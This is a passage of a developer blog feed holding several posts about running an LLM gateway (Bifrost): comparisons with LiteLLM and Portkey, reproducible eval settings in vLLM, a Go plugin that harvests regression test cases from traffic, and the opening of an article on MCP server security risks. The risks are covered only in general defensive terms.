&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Provider breadth&lt;/td&gt;
&lt;td&gt;23+&lt;/td&gt;
&lt;td&gt;Largest list&lt;/td&gt;
&lt;td&gt;Broad&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-key load balancing&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semantic caching&lt;/td&gt;
&lt;td&gt;Built in&lt;/td&gt;
&lt;td&gt;Via config&lt;/td&gt;
&lt;td&gt;Strong, managed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Observability UI&lt;/td&gt;
&lt;td&gt;Prometheus + web UI&lt;/td&gt;
&lt;td&gt;Thinner UI&lt;/td&gt;
&lt;td&gt;Best-in-class dashboards&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Governance / virtual keys&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Basic&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you want the widest provider list and you're Python-native already, LiteLLM is the pragmatic pick. If you want a managed dashboard and don't want to run infrastructure, Portkey's observability is ahead of what we self-host. We picked Bifrost because the Go gateway's overhead was low enough to not show up in our latency numbers, and we wanted the whole thing inside our network with no per-call data leaving. &lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;Virtual keys&lt;/a&gt; also let us split eval spend by team, which Stripe-brain me appreciates.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and Limitations
&lt;/h2&gt;

&lt;p&gt;It's another process to run. If your eval suite only hits one provider, a gateway is pure overhead. Don't add it for a single backend.&lt;/p&gt;

&lt;p&gt;Semantic caching can lie to you in evals. A cached response means you're scoring an old generation, not the current model. We disable caching on any run that's measuring model quality and only enable it for re-scoring runs where the generations are fixed and the rubric changed. If you forget that, you'll report a model improvement that's actually a cache hit.&lt;/p&gt;

&lt;p&gt;The unified API smooths over provider differences you sometimes want to see. Bedrock's stop-reason semantics aren't identical to OpenAI's. The gateway normalizes the response shape, so a few provider-specific fields we used to inspect now need digging. For most eval work that's fine. For debugging a weird truncation, I still drop to the raw provider once in a while.&lt;/p&gt;

&lt;p&gt;And it's young. The community is smaller than LiteLLM's. When I hit an edge case with Vertex auth, there were fewer GitHub issues to crib from. We filed one.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I'd tell my past self
&lt;/h2&gt;

&lt;p&gt;The model swap was never the work. The work was making five providers behave like one so the comparison meant something. A gateway is the boring infrastructure answer, and boring is what you want under an eval harness.&lt;/p&gt;

&lt;p&gt;Run the sweep clean. Hold the plumbing constant. Then argue about the models.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost on GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/retries-and-fallbacks" rel="noopener noreferrer"&gt;Retries and fallbacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/semantic-caching" rel="noopener noreferrer"&gt;Semantic caching&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;Governance and virtual keys&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/quickstart/gateway/setting-up" rel="noopener noreferrer"&gt;Gateway setup guide&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>devops</category>
    </item>
    <item>
      <title>temperature=0 didn't make our LLM evals reproducible</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Tue, 23 Jun 2026 06:31:32 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/temperature0-didnt-make-our-llm-evals-reproducible-5ae6</link>
      <guid>https://dev.to/marcuswwchen/temperature0-didnt-make-our-llm-evals-reproducible-5ae6</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: We set &lt;code&gt;temperature=0&lt;/code&gt; and &lt;code&gt;seed=42&lt;/code&gt; and still got different eval scores on the same 800-prompt suite across runs. The cause wasn't the sampler. It was batch-dependent floating point in the inference engine plus silent provider routing. We chased it for a week. Here's what we found and the three things that actually fixed it.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I lead the eval team at Nexus Labs. We fine-tune small models for enterprise agent automation, and our whole release process hangs on one number: pass rate on an 800-prompt domain suite. Green means ship.&lt;/p&gt;

&lt;p&gt;Two weeks ago the same model, same suite, same code gave us 81.4% on Monday and 79.6% on Wednesday. Nobody touched the weights. That's a 14-prompt swing on a frozen artifact. If your eval moves more than your model improvements, you can't ship on it.&lt;/p&gt;

&lt;h2&gt;
  
  
  temperature=0 is not determinism
&lt;/h2&gt;

&lt;p&gt;First assumption everyone makes: greedy decoding is deterministic. Set temperature to 0, you always pick the argmax token, done.&lt;/p&gt;

&lt;p&gt;It isn't. &lt;code&gt;temperature=0&lt;/code&gt; removes sampling randomness. It does nothing about the fact that the logits themselves change depending on what else is in the batch.&lt;/p&gt;

&lt;p&gt;vLLM (we run 0.6.x) uses continuous batching. Your prompt gets grouped with whatever other requests are in flight. Matrix multiply reductions over a batch of 4 versus a batch of 32 accumulate floating point in a different order. The result is a logit that differs in the 5th decimal place. Usually harmless. But when two candidate tokens are within ~1e-4 of each other, the argmax flips. One flipped token early in a tool-call response cascades into a different JSON structure, which fails our parser, which drops a point.&lt;/p&gt;

&lt;p&gt;So our "deterministic" eval was deterministic per request but not across batch compositions. Run the suite when the cluster is busy, you get a different batch shape, you get a different score.&lt;/p&gt;

&lt;h2&gt;
  
  
  The second source: we didn't know which model answered
&lt;/h2&gt;

&lt;p&gt;The bigger embarrassment. Our eval harness pointed at an internal endpoint that load-balanced across two provider deployments during a migration. About 6% of eval requests were silently hitting a different build of the serving stack with a different quantization. We had no per-request record of which backend served which prompt.&lt;/p&gt;

&lt;p&gt;You can't debug a number you can't attribute. The fix for this half was operational, not numerical: route eval traffic through a gateway that logs the exact provider and model per request. We already run Bifrost (&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;https://github.com/maximhq/bifrost&lt;/a&gt;) in front of our providers for failover, and its per-request logging gave us the backend attribution we'd been missing. LiteLLM does the equivalent; the point is you need the provenance, not a specific logo.&lt;/p&gt;

&lt;p&gt;Once every eval response carried a backend tag, the 6% lit up immediately.&lt;/p&gt;

&lt;h2&gt;
  
  
  What moved the number
&lt;/h2&gt;

&lt;p&gt;We measured each suspected cause by running the 800-prompt suite 20 times and looking at score variance.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Score range over 20 runs&lt;/th&gt;
&lt;th&gt;Fixed by&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Batch-dependent FP (continuous batching)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;±1.8 pts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pin eval batch size to 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Silent provider routing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;±2.1 pts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-request backend logging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Parser tolerance on whitespace&lt;/td&gt;
&lt;td&gt;&lt;code&gt;±0.9 pts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Normalize before compare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unseeded prompt shuffle in harness&lt;/td&gt;
&lt;td&gt;0 pts (red herring)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The prompt-shuffle thing was where we wasted two days. Order doesn't change per-prompt correctness. We knew that. We checked it anyway because it was easy to check, which is its own lesson about how panic allocates engineering time.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;Three changes. None of them clever.&lt;/p&gt;

&lt;p&gt;First, eval runs go through a dedicated config with batch size pinned. Slower, but reductions happen over a fixed shape every time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# eval-serving.yaml&lt;/span&gt;
&lt;span class="na"&gt;engine&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;max_num_seqs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;        &lt;span class="c1"&gt;# no co-batching during eval&lt;/span&gt;
  &lt;span class="na"&gt;enforce_eager&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;    &lt;span class="c1"&gt;# disable CUDA graph capture variance&lt;/span&gt;
&lt;span class="na"&gt;sampling&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;temperature&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0.0&lt;/span&gt;
  &lt;span class="na"&gt;seed&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;42&lt;/span&gt;
  &lt;span class="na"&gt;top_p&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1.0&lt;/span&gt;
&lt;span class="na"&gt;logging&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;log_backend_id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# which deployment served this request&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;enforce_eager: true&lt;/code&gt; matters more than it looks. CUDA graph capture in vLLM can introduce its own kernel-selection differences across runs. Eager mode is slower but it removed another &lt;code&gt;±0.4&lt;/code&gt; we hadn't isolated separately.&lt;/p&gt;

&lt;p&gt;Second, every eval response is stored with the backend identifier and the raw logprobs of the top 2 tokens at each position. When a score moves now, we diff the logprob traces and find the exact prompt and position where decoding diverged. Takes minutes, not days.&lt;/p&gt;

&lt;p&gt;Third, we report eval scores as a range over 5 runs, not a single number. If the range is wider than 1 point, the result is "inconclusive, rerun," not "regression." We stopped pretending a single float is ground truth.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and Limitations
&lt;/h2&gt;

&lt;p&gt;Batch size 1 for eval is expensive. Our 800-prompt suite went from 4 minutes to 19. We accept that because eval correctness is worth more than eval speed, but if you run evals on every commit, 19 minutes is a real tax. We gate it: fast batched eval on PRs for a rough signal, pinned eval on release candidates only.&lt;/p&gt;

&lt;p&gt;Pinning &lt;code&gt;enforce_eager&lt;/code&gt; and &lt;code&gt;max_num_seqs: 1&lt;/code&gt; means your eval environment no longer matches production serving conditions. You're measuring the model, not the production system. That's the right call for catching regressions in weights, the wrong call if you're trying to reproduce a user-reported production bug, where batch effects are part of the story.&lt;/p&gt;

&lt;p&gt;And storing top-2 logprobs per position roughly tripled our eval artifact storage. Cheap at our 800-prompt scale. Reconsider it at 100k.&lt;/p&gt;

&lt;p&gt;None of this makes the eval "correct." It makes it reproducible. Those are different problems. A reproducible eval that measures the wrong thing is still wrong, just consistently. The contents of the suite are still the hard part.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.vllm.ai/en/latest/dev/sampling_params.html" rel="noopener noreferrer"&gt;vLLM sampling parameters&lt;/a&gt; — the actual knobs, including &lt;code&gt;seed&lt;/code&gt; and &lt;code&gt;enforce_eager&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost AI gateway&lt;/a&gt; — per-request provider logging and failover&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pytorch.org/docs/stable/notes/randomness.html" rel="noopener noreferrer"&gt;Numerical reproducibility in PyTorch&lt;/a&gt; — why CUDA reductions aren't order-stable&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.anyscale.com/blog/continuous-batching-llm-inference" rel="noopener noreferrer"&gt;Continuous batching explained&lt;/a&gt; — the mechanism behind the batch-shape variance&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>Harvesting a regression test set from gateway logs with a plugin</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Mon, 22 Jun 2026 16:01:28 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/harvesting-a-regression-test-set-from-gateway-logs-with-a-plugin-4926</link>
      <guid>https://dev.to/marcuswwchen/harvesting-a-regression-test-set-from-gateway-logs-with-a-plugin-4926</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: Our eval sets went stale because a human wrote the test cases by hand once and never updated them. We moved the capture point into the gateway. A Bifrost custom plugin logs every production request and response, and we curate a weekly regression set from real traffic instead of inventing inputs at our desks.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I lead the fine-tuning and eval team at Nexus Labs. Six people. We ship enterprise agent automation, and the model is the easy part. The hard part is knowing whether last week's change made anything better or quietly broke a customer's workflow.&lt;/p&gt;

&lt;p&gt;For a year our regression suite was 120 hand-written cases. Someone on the team sat down, imagined what a user might ask, and froze it. By month three those inputs looked nothing like what real agents were sending. We were grading ourselves on a test we wrote, not the one production was running.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why the gateway is the right capture point
&lt;/h2&gt;

&lt;p&gt;We route every model call through Bifrost, an open-source AI gateway in front of OpenAI, Anthropic, and our self-hosted vLLM endpoints. It already sees the full request and response for &lt;code&gt;gpt-4o-mini&lt;/code&gt; and our fine-tuned Qwen2.5-7B. That's the natural seam to tap.&lt;/p&gt;

&lt;p&gt;Capturing inside the application means touching every service. Capturing at the gateway means one place. Bifrost ships a custom plugin system, a middleware layer with a pre-hook and a post-hook around each call, documented under &lt;a href="https://docs.getbifrost.ai/enterprise/custom-plugins" rel="noopener noreferrer"&gt;Custom Plugins&lt;/a&gt;. We wrote a plugin that copies request and response into a Postgres table with the model id, latency, and token counts attached.&lt;/p&gt;

&lt;p&gt;Here's the shape of it. Go, because Bifrost is Go.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;EvalCapturePlugin&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;PostHook&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;schemas&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BifrostRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;schemas&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BifrostResponse&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;schemas&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BifrostResponse&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c"&gt;// sample 5% of traffic, skip anything flagged PII&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="m"&gt;20&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Meta&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Sensitive&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;queue&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;-&lt;/span&gt; &lt;span class="n"&gt;EvalSample&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;Model&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;   &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Input&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;   &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Input&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Output&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;  &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Choices&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Message&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Latency&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ExtraFields&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Latency&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Tokens&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;  &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Usage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TotalTokens&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The queue drains to Postgres on a separate goroutine so we don't add latency to the request path. We sample 5%, which at our volume is roughly 9,000 captured calls a day.&lt;/p&gt;

&lt;h2&gt;
  
  
  Curating, not dumping
&lt;/h2&gt;

&lt;p&gt;Raw traffic is not an eval set. It's a pile. Most of it is repetitive and low-signal.&lt;/p&gt;

&lt;p&gt;Each week we pull the captured rows and cluster them by embedding. We keep one representative per cluster, drop near-duplicates, and oversample the tail where the agent hit a tool-call error or returned an empty completion. That tail is where regressions hide. The result is around 400 cases a week, which we human-review down to maybe 250 before it joins the frozen suite.&lt;/p&gt;

&lt;p&gt;The frozen suite is now 1,900 cases and growing from real inputs. Last month it caught a 6-point drop in tool-call accuracy on our Qwen fine-tune that the old hand-written set sailed straight past, because no human had thought to write a case with three nested function calls.&lt;/p&gt;

&lt;p&gt;You also get the metrics for free. Bifrost emits native Prometheus counters per model, so we already had latency and token distributions to weight the sampling toward expensive calls.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bifrost vs LiteLLM vs Portkey
&lt;/h2&gt;

&lt;p&gt;We looked at three gateways for this. Honest read:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Bifrost&lt;/th&gt;
&lt;th&gt;LiteLLM&lt;/th&gt;
&lt;th&gt;Portkey&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Custom logging hook&lt;/td&gt;
&lt;td&gt;Go plugin, in-process&lt;/td&gt;
&lt;td&gt;Python callback / custom logger&lt;/td&gt;
&lt;td&gt;Hosted logs + feedback API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-hosted, full data control&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Self-host on paid tier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Language&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Python&lt;/td&gt;
&lt;td&gt;Managed service&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Overhead at high QPS&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Higher under load&lt;/td&gt;
&lt;td&gt;Network hop to their edge&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Setup friction&lt;/td&gt;
&lt;td&gt;Write Go, compile&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip install&lt;/code&gt;, edit config&lt;/td&gt;
&lt;td&gt;Fastest, UI out of the box&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;LiteLLM was the obvious pick for an ML team. It's Python, so our existing data tooling drops right in, and its provider list is larger. If you want a callback in 10 minutes, it wins. We hit throughput limits under our agent burst traffic that Bifrost's Go path handled without tuning.&lt;/p&gt;

&lt;p&gt;Portkey has the most polished logging UI and a real feedback API we didn't have to build. The tradeoff is that the data lives in their system unless you're on the self-hosted plan, and a customer contract ruled that out for us. If you want a managed dashboard and don't have a data-residency clause, Portkey is a reasonable call.&lt;/p&gt;

&lt;p&gt;We picked Bifrost because the capture runs in-process with no extra network hop, the plugin is the same binary as the gateway, and the &lt;a href="https://docs.getbifrost.ai/features/observability/default" rel="noopener noreferrer"&gt;logging&lt;/a&gt; plus plugin surface gave us both metrics and raw payloads in one place.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and Limitations
&lt;/h2&gt;

&lt;p&gt;Writing a plugin in Go is more work than a Python callback. If your team doesn't read Go, that's a real cost, and LiteLLM is the saner choice.&lt;/p&gt;

&lt;p&gt;Sampling is lossy. At 5% we miss rare inputs, and we've had to bump specific routes to 100% capture when a customer reported a bug we couldn't reproduce.&lt;/p&gt;

&lt;p&gt;PII is on you. The gateway sees everything, so the plugin has to redact before it writes, and we still run a scrubbing pass before any human looks at a row. Getting this wrong is worse than a stale eval set.&lt;/p&gt;

&lt;p&gt;And capturing traffic doesn't grade it. You still need a scoring harness and labels. The gateway gives you the inputs and outputs. The judgment is the part you can't outsource to infrastructure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/enterprise/custom-plugins" rel="noopener noreferrer"&gt;Bifrost Custom Plugins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/observability/default" rel="noopener noreferrer"&gt;Bifrost Observability and logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost GitHub repo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.litellm.ai/docs/observability/custom_callback" rel="noopener noreferrer"&gt;LiteLLM custom callbacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://portkey.ai/docs/product/observability/feedback" rel="noopener noreferrer"&gt;Portkey feedback API&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>mlops</category>
      <category>llm</category>
      <category>machinelearning</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>The MCP server problem hiding on every developer laptop</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Mon, 22 Jun 2026 06:17:20 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/the-mcp-server-problem-hiding-on-every-developer-laptop-3blh</link>
      <guid>https://dev.to/marcuswwchen/the-mcp-server-problem-hiding-on-every-developer-laptop-3blh</guid>
      <description>&lt;p&gt;&lt;em&gt;MCP servers let AI tools read files, call APIs, and act inside internal systems, and most of them run on individual developer machines with no oversight. This guide explains the security risks of ungoverned MCP servers and how the Bifrost AI gateway and Bifrost Edge bring them under control across the fleet.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A developer can connect an MCP server to a coding agent in under a minute, granting an AI model the ability to read files, call internal APIs, and take actions inside the systems it touches. Useful as that is, each connection also creates an access path that the security team never reviewed and often cannot see. Across a team of any size, these connections accumulate on individual laptops, and most organizations have no record of which MCP servers exist, what they can reach, or which credentials they hold. Gartner has predicted that by 2028, a quarter of enterprise breaches will trace back to &lt;a href="https://www.gartner.com/en/newsroom/press-releases/2024-10-22-gartner-unveils-top-predictions-for-it-organizations-and-users-in-2025-and-beyond" rel="noopener noreferrer"&gt;AI agent abuse&lt;/a&gt;, and MCP servers are a primary path through which that agent access reaches real systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  What an MCP server is, and why it carries risk
&lt;/h2&gt;

&lt;p&gt;An MCP server is a program that exposes tools, data, or actions to an AI model through the Model Context Protocol, the open standard that lets assistants and coding agents reach beyond their own context into files, APIs, databases, and other systems. The capability is what makes agents useful, and it is also what makes them risky, because a connected server gives a model a path into real infrastructure that is governed only by whatever the protocol and the surrounding setup happen to enforce.&lt;/p&gt;

&lt;p&gt;MCP was built for interoperability and ease of integration first, and it leaves much of the security enforcement to whoever deploys a server. Many MCP servers, especially the ones running locally on a laptop, operate with whatever access the developer granted and no check on individual tool calls unless controls are added around them. The official &lt;a href="https://modelcontextprotocol.io/docs/tutorials/security/security_best_practices" rel="noopener noreferrer"&gt;MCP security guidance&lt;/a&gt; is explicit that a local server can execute arbitrary code, so connecting an untrusted server is equivalent to running untrusted software on the machine.&lt;/p&gt;

&lt;p&gt;The risks fall into a few recurring categories:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Overbroad access is the norm rather than the exception, because a new server is often granted whatever credentials make it work, a database token, a repository-wide key, or a cloud role, and those credentials are rarely scoped down or rotated afterward.&lt;/li&gt;
&lt;li&gt;Prompt injection and tool poisoning exploit how the model reads its inputs, since malicious content in a file, ticket, or web page can carry instructions an agent follows, and a malicious server can describe its tools in ways that steer the model toward unintended actions.&lt;/li&gt;
&lt;li&gt;Supply chain exposure comes with every install, because MCP servers pull in external packages, so a flaw or a planted payload upstream becomes a flaw on every machine that added the server.&lt;/li&gt;
&lt;li&gt;Lateral movement grows as agents chain servers together, reading a repository, querying a database, retrieving a secret, then posting to chat, so a single manipulated step can reach across many systems at once.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Why MCP servers on developer machines are hard to govern
&lt;/h2&gt;

